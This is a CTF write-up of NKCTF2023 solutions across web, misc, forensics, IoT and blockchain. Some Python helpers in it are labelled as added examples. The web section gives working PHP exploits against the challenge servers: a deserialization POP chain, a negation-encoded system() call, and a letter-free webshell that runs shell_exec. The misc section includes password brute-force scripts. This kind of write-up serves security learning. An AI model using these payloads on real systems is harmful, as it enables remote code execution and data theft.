Overall it was a good experience; thanks to my binary teammate for carrying me.
WEB
babyphp
POP chain: __destruct() -> __toString() -> __invoke(). The last step has to get past a regex filter. `dir` showed that the flag lives at /f1ag, so the wildcard characters the filter leaves alone are used to match the path (in bash, `[^b]` matches any single character except b, so `/[^b]1[^b][^b]` expands to /f1ag). Exploit:
<?php
// Gadget chain as described above: __destruct() -> __toString() -> __invoke(),
// nested Welcome -> Hell0 -> Happy
class Welcome {
    public $name;
    public $arg;
}
class Happy {
    public $shell;
    public $cmd;
}
class Hell0 {
    public $func;
}
$a = new Welcome;
$a->name = "welcome_to_NKCTF";
$a->arg = new Hell0;
$a->arg->func = new Happy;
$a->arg->func->shell = 'system';
// bash glob: [^b] matches any single character except b, so /[^b]1[^b][^b] expands to /f1ag
$a->arg->func->cmd = 'more /[^b]1[^b][^b]';
echo serialize($a);
?>
easyphp
Level 1: md5 loose comparison, bypassed with arrays.
Level 2: sha1 strict comparison with a forced string cast, bypassed with the well-known SHA-1 PDF collision pair (the SHAttered PDFs).
Level 3: bypassed using float behaviour, 114514.1.
Level 4: uses the fact that once PHP has turned the `[` in a parameter name into `_` it stops rewriting the remaining characters of that name: NS[CTF.go.
Level 5: bitwise negation bypass, (~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98); which is ~"system" called on ~"cat /flag".
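An added example (not code from the original writeup) that generates and checks the level-5 negation payload in Python: PHP's `~` on a string flips every byte, so a callable name and its argument can be supplied as high-bit bytes that contain no letters or digits, and `(~"...")(~"...")` becomes a dynamic function call. The names `system` and `cat /flag` are the ones in the payload above; `build_call` and `passes_letter_filter` are this example's own helpers, and the filter they model (a regex banning alphanumerics on the raw input) is an assumption.

```python
from urllib.parse import unquote_to_bytes


def php_negate(s: str) -> str:
    """URL-encoded bytewise complement of s: what PHP's ~ must see to produce s."""
    return "".join(f"%{(~b) & 0xFF:02X}" for b in s.encode())


def php_unnegate(encoded: str) -> str:
    """Reverse php_negate: URL-decode, then complement every byte (what PHP's ~ does to a string)."""
    return bytes((~b) & 0xFF for b in unquote_to_bytes(encoded)).decode()


def build_call(func: str, arg: str) -> str:
    """(~<func>)(~<arg>); a call through a negated-string callable, as in the level-5 payload."""
    return f"(~{php_negate(func)})(~{php_negate(arg)});"


def passes_letter_filter(encoded: str) -> bool:
    """True when the decoded payload bytes contain no ASCII letters or digits,
    i.e. an assumed filter such as preg_match('/[a-z0-9]/i', $input) would not fire."""
    raw = unquote_to_bytes(encoded)
    return not any(chr(b).isalnum() for b in raw if b < 0x80)


if __name__ == "__main__":
    payload = build_call("system", "cat /flag")
    print(payload)
    print(passes_letter_filter(payload))
    print(php_unnegate("%9C%9E%8B%DF%D0%99%93%9E%98"))
```

Every byte of an ASCII string negates to a value of 0x80 or above, which is why the encoded form never contains a letter; `php_unnegate` is the quick way to read someone else's negated payload back.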
easy_pms
Following the article at http://www.360doc.com/content/12/0121/07/77981587_1066789891.shtml: first activate the cookie, then RCE:
hard_php
The classic no-letters webshell with some other characters banned as well, length limited to 105; I reused a payload from the earlier ctfshow extreme-RCE challenge. phpinfo showed disable_functions in effect, but shell_exec was not blocked. The challenge box has no outbound network access, so the flag is redirected into 1.txt and then fetched over HTTP. Payload:
NKCTF=$_=(_/_._)[_];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[__]);&_=shell_exec&__=cat /flag > 1.txt
The chain builds the string _POST out of PHP's string increment: under PHP 7, `_` is an undefined constant treated as the string "_", `"_"/"_"` evaluates to NAN, NAN._ is "NAN_", and the non-numeric offset _ casts to 0, so `(_/_._)[_]` is "N"; the ++ operations then walk N -> O -> P and S -> T to assemble "POST", and `$$_[_]($$_[__])` is $_POST[_]($_POST[__]), i.e. shell_exec("cat /flag > 1.txt").
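To make the increment chain in the payload above checkable, here is an added Python example (not code from the writeup) that reimplements PHP's alphanumeric string `++` and replays the steps. The starting "N" and the evaluation-order rule it relies on (in PHP, `$a . $a++` reads the already-incremented `$a` on the left, which is why `echo $a.$a++;` prints "21") are PHP 7 behaviour; `trace_payload` is this example's own helper.

```python
def php_increment(s: str) -> str:
    """PHP's ++ on a string: Perl-style alphanumeric increment with carry
    ("O" -> "P", "Az" -> "Ba", "Zz" -> "AAa", "a9" -> "b0", "" -> "1")."""
    if s == "":
        return "1"
    chars = list(s)
    for i in range(len(chars) - 1, -1, -1):
        c = chars[i]
        if c == "z":
            chars[i] = "a"          # wrap and carry into the position to the left
        elif c == "Z":
            chars[i] = "A"
        elif c == "9":
            chars[i] = "0"
        elif c.isascii() and c.isalnum():
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)  # no carry: done
        else:
            return "".join(chars)  # PHP stops at a non-alphanumeric character
    # carried out of the leftmost position: PHP prepends a new digit or letter
    first = s[0]
    prefix = "1" if first.isdigit() else ("a" if first.islower() else "A")
    return prefix + "".join(chars)


def trace_payload():
    """Replay the variable-building part of the webshell; returns ($_ at the end, step log)."""
    log = []
    v = "NAN_"[0]                   # $_=(_/_._)[_]  -> "N"
    log.append(f'$_ = "{v}"')
    v = php_increment(v)            # ++$_           -> "O"
    log.append(f'++$_ -> "{v}"')
    # $__=$_.$_++ : the post-increment runs before the left operand is read, giving "P"."O"
    old, v = v, php_increment(v)
    acc = v + old
    log.append(f'$__ = "{acc}", $_ = "{v}"')
    for _ in range(3):              # ++$_;++$_;++$_ -> "Q", "R", "S"
        v = php_increment(v)
    log.append(f'$_ -> "{v}"')
    old, v = v, php_increment(v)    # $__.=$_++.$_  -> appends "S"."T"
    acc += old + v
    log.append(f'$__ = "{acc}", $_ = "{v}"')
    name = "_" + acc                # $_=_.$__       -> "_POST"
    log.append(f'$_ = "{name}"')
    return name, log


if __name__ == "__main__":
    final, steps = trace_payload()
    print("\n".join(steps))
    print(f"{final}[_]({final}[__]) is the dynamic call")
```

The same helper lets you plan a different target name (for example `_GET`) by counting how many `++` steps separate the letters you can reach from the ones you need.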
webpagetest
The AVD-2022-1474319 vulnerability; see https://xz.aliyun.com/t/11798#toc-1.
Generate a phar file that runs the `id` command with phpggc, send it, and the rest follows as a one-stop job.
MISC
hard-misc
Sign-in challenge: base32, then message the official WeChat account.
NKCTF2023 questionnaire
blue
Classic forensics; the flag is in the Recycle Bin:
THMaster
Find the trainer from the Touhou wiki; its link is dead, so get it from Tieba:
thprac.v2.2.1.2.exe
Change the score before entering practice mode, then enter.
A prompt said it was decrypted, and a replay named flag appeared in the replay list.
Watched it through without finding anything; asked the challenge author: it is in the file itself. Open it in 010 Editor and look at the end of the file.
三体 (Three-Body)
Half the flag was at the end of the file. Knowing the flag is laid out in RGB order, searching for `}` in RGB order turned up the other half.
Concatenating the two halves gives the flag.
easy_bmp
Width/height challenge. The height can simply be edited; just don't make it too large:
The width has to be computed from the BMP layout: the depth is 32 bits (4 bytes per pixel), so 1589466/4/283 = 1404 (the few bytes left over are the header); the image can be dropped into Photoshop to check:
Putting the pieces together gives the archive password; it extracts to another bmp, and this time both width and height have to be computed. The depth is 8, one byte per pixel, so the data size equals the pixel count; guessing a square image, the side is the square root, about 360, which gives the flag:
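As an added example (not part of the writeup), the width/height arithmetic above in Python, generalised to any bit depth and with BMP's 4-byte row padding taken into account: the pixel data is the on-disk file size minus the data offset stored at byte 10 of the header, each row is `((width*bpp + 31) // 32) * 4` bytes, so a trusted height gives the row length and the row length gives the width (for 8-bit images several widths share one padded row length). The constructed header below assumes the first image's numbers from the text (file size 1589466, 32 bpp, height 283, 138-byte header) with the width field zeroed; the 1078-byte offset used for the 8-bit case (14 + 40 + 1024-byte palette) is also an assumption.

```python
import math
import struct
from typing import Optional


def row_stride(width: int, bpp: int) -> int:
    """Bytes per pixel row in a BMP: rows are padded to a multiple of 4 bytes."""
    return ((width * bpp + 31) // 32) * 4


def widths_for_row(row_bytes: int, bpp: int) -> list:
    """All widths whose padded row length is exactly row_bytes (several for bpp < 32)."""
    max_w = row_bytes * 8 // bpp
    return [w for w in range(1, max_w + 1) if row_stride(w, bpp) == row_bytes]


def parse_bmp_header(header: bytes) -> dict:
    """Pull the fields needed for size recovery out of BITMAPFILEHEADER + BITMAPINFOHEADER."""
    if header[:2] != b"BM":
        raise ValueError("not a BMP")
    bf_size, _reserved, data_offset = struct.unpack_from("<III", header, 2)
    width, height, _planes, bpp = struct.unpack_from("<iiHH", header, 18)
    # a negative height only means top-down row order
    return {"bf_size": bf_size, "data_offset": data_offset,
            "width": width, "height": abs(height), "bpp": bpp}


def recover_width(file_size: int, data_offset: int, bpp: int, height: int) -> list:
    """Candidate widths when the height is trusted but the width field was tampered with.
    Pass the real on-disk size (os.path.getsize), not bfSize, which may have been edited too."""
    pixel_bytes = file_size - data_offset
    if height <= 0 or pixel_bytes % height:
        return []                    # height does not divide the data: it is wrong as well
    return widths_for_row(pixel_bytes // height, bpp)


def guess_square(file_size: int, data_offset: int, bpp: int) -> Optional[int]:
    """Both dimensions unknown: test the writeup's square-image guess against the data size."""
    pixel_bytes = file_size - data_offset
    side = math.isqrt(pixel_bytes * 8 // bpp)
    return side if row_stride(side, bpp) * side == pixel_bytes else None


def constructed_header() -> bytes:
    """Constructed 138-byte header (14 + BITMAPV5HEADER) with the width zeroed, as the challenge file might look."""
    file_hdr = struct.pack("<2sIII", b"BM", 1589466, 0, 138)
    info_hdr = struct.pack("<IiiHH", 124, 0, 283, 1, 32)
    return (file_hdr + info_hdr).ljust(138, b"\x00")


if __name__ == "__main__":
    info = parse_bmp_header(constructed_header())
    print(recover_width(1589466, info["data_offset"], info["bpp"], info["height"]))
    print(widths_for_row(360, 8))
    print(guess_square(130678, 1078, 8))
```

For the 8-bit image the padding means widths 357 to 360 all produce 360-byte rows, which is why the square guess (and a look at the rendered result) is needed to settle it.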
easy_rgb
Montage + gaps reassemble the jigsaw and give the key that unpacks rgb.rar:
Three txt files come out; taking one character from each in r, g, b order produces a zip, so write a script to extract it:
# Open the three streams as bytes
file1 = open("r.txt", "rb")
file2 = open("g.txt", "rb")
file3 = open("b.txt", "rb")
# Output: the bytes interleaved in r, g, b order
p = open("decode.txt", "wb")
data = []
# Read one byte from each file in turn until all three are exhausted
while True:
    i = file1.read(1) + file2.read(1) + file3.read(1)
    if not i:
        break
    data.append(i)
for i in data:
    p.write(i)
p.close()
Hex-decoding the contents of decode.txt yields the zip; it is AES-128 with a weak password:
easy_word
Brute-force the password:
import hashlib
import itertools
import string

s = 'b75d1224'                                  # known first 8 hex digits of sha256(password)
chars = string.ascii_letters + string.digits    # character set for the unknown positions
# Password mask h??vO??0: four unknown alphanumeric characters
for i, j, k, n in itertools.product(chars, repeat=4):
    psw = 'h' + i + j + 'vO' + k + n + '0'
    sha256 = hashlib.sha256(psw.encode('utf-8')).hexdigest()
    if sha256.startswith(s):
        print(psw)
Remove the password from the document, unzip the docx, and there is a hidden image inside.
Trial and error showed it is cloacked-pixel; the key is the one written on the picture:
first spam of rabbit year
Decode with https://www.spammimic.com/decode.shtml:
Core Socialist Values encoding:
与佛论禅 (Buddha cipher) at https://fy.by950.top/, password rabbit:
Inspecting the characters reveals zero-width characters:
Together with the tip at the end, 47&13: the ciphertext has been ROT47'd and the key ROT13'd; undo both and decrypt Rabbit.
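An added Python example (not from the writeup) for the last two steps: a detector that reports where zero-width characters hide in a string, and ROT13/ROT47, which are their own inverses, so the same functions undo the 47&13 transformation on the ciphertext and key. The sample string is constructed for the demonstration; the Rabbit decryption itself is left to a tool.

```python
import codecs

# Invisible code points commonly used for zero-width steganography
ZERO_WIDTH = {
    "\u200b": "ZWSP",   # zero width space
    "\u200c": "ZWNJ",   # zero width non-joiner
    "\u200d": "ZWJ",    # zero width joiner
    "\u2060": "WJ",     # word joiner
    "\ufeff": "BOM",    # zero width no-break space
}


def find_zero_width(text: str) -> list:
    """(index, name) for every zero-width character in text, in order."""
    return [(i, ZERO_WIDTH[c]) for i, c in enumerate(text) if c in ZERO_WIDTH]


def strip_zero_width(text: str) -> str:
    """The visible text with all zero-width characters removed."""
    return "".join(c for c in text if c not in ZERO_WIDTH)


def rot13(s: str) -> str:
    """Rotate letters by 13; digits and punctuation are untouched."""
    return codecs.decode(s, "rot_13")


def rot47(s: str) -> str:
    """Rotate every printable ASCII character (33..126) by 47; applying it twice restores the input."""
    return "".join(chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c
                   for c in s)


if __name__ == "__main__":
    sample = "ra\u200bb\u200cbit"          # constructed: "rabbit" with two hidden characters
    print(find_zero_width(sample), repr(strip_zero_width(sample)))
    print(rot47("Hello"), rot13("rabbit"))
```

ROT47 covers the whole printable range, so a Base64-looking ciphertext that comes out as punctuation soup is the usual sign it was applied; ROT13 only touches letters, which is why it was used on the key.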
baby_music
Looking at the hex, the sample data is very regular: every 16-bit sample is either 1027 or 1127 (little-endian 0x2710 = 10000 or 0x2711 = 10001), so guess they encode binary digits and extract them with a script:
# Read the WAV two bytes (one 16-bit sample) at a time:
# on disk 10 27 (0x2710) encodes a 0 bit and 11 27 (0x2711) a 1 bit;
# header bytes match neither pattern and are skipped
file1 = open("flag.wav", "rb")
# Output: the recovered bit string as ASCII '0'/'1'
p = open("flag1.txt", "wb")
data = []
while True:
    i = file1.read(2)
    if not i:
        break
    i = i.hex()
    if i == '1027':
        data.append(b'0')
    elif i == '1127':
        data.append(b'1')
for i in data:
    p.write(i)
p.close()
After extraction, From Binary turns the bits into a zip. The archive comment is Morse code telling us the password is 16 random characters, so brute force is out; but the zip holds a png and the archive meets the preconditions of a known-plaintext attack, so bkcrack (Biham-Kocher attack on ZipCrypto, with the PNG header as known plaintext) recovers the internal keys and yields flag.png:
misc?iot!
The firmware name says the board is an STM32F103C8, a classic ARM (Cortex-M3) dev board; load it in IDA as ARM little-endian and it decompiles.
Following from start leads to the key encryption routine; its characteristic structure suggests RC4.
The encrypted data segment and the key are easy to find.
Blockchain
SignIn
Scroll down to the contract-creation transaction, take the contract input data, and convert the hex to a string.
HelloWorld
web3.py:
from web3 import Web3, HTTPProvider

# web3.py v5 API (v6 renamed these to snake_case: is_connected, from_key, build_transaction, ...)
w3 = Web3(HTTPProvider('http://blockchain.247533.top:10020'))
assert w3.isConnected()

# Load the account from its private key (fill in your own)
pk = '<private key>'
account = w3.eth.account.privateKeyToAccount(pk)
# print(account.address)

abi = '[{"inputs":[{"internalType":"string","name":"_greeting","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"greet","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"_greeting","type":"string"}],"name":"setGreeting","outputs":[],"stateMutability":"nonpayable","type":"function"}]'
contract = w3.eth.contract(address='0x781CA0733773aBE77138b00B77B7D8D79aAEd52A', abi=abi)

# Build the setGreeting transaction
tx = contract.functions.setGreeting('Hello,NKCTF2023').buildTransaction({
    'from': account.address,
    'nonce': w3.eth.getTransactionCount(account.address),
    'gas': 1000000,
    'gasPrice': w3.toWei('1', 'gwei'),
})
# Sign it locally with the private key
signed_tx = account.signTransaction(tx)
# Broadcast the raw signed transaction
tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)
# Wait for it to be mined and show the receipt
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
print(tx_receipt)
decompile_revenge
Get the contract bytecode and decompile it:
The four sha256 hashes are cracked straight away with the somd5 service the challenge points to.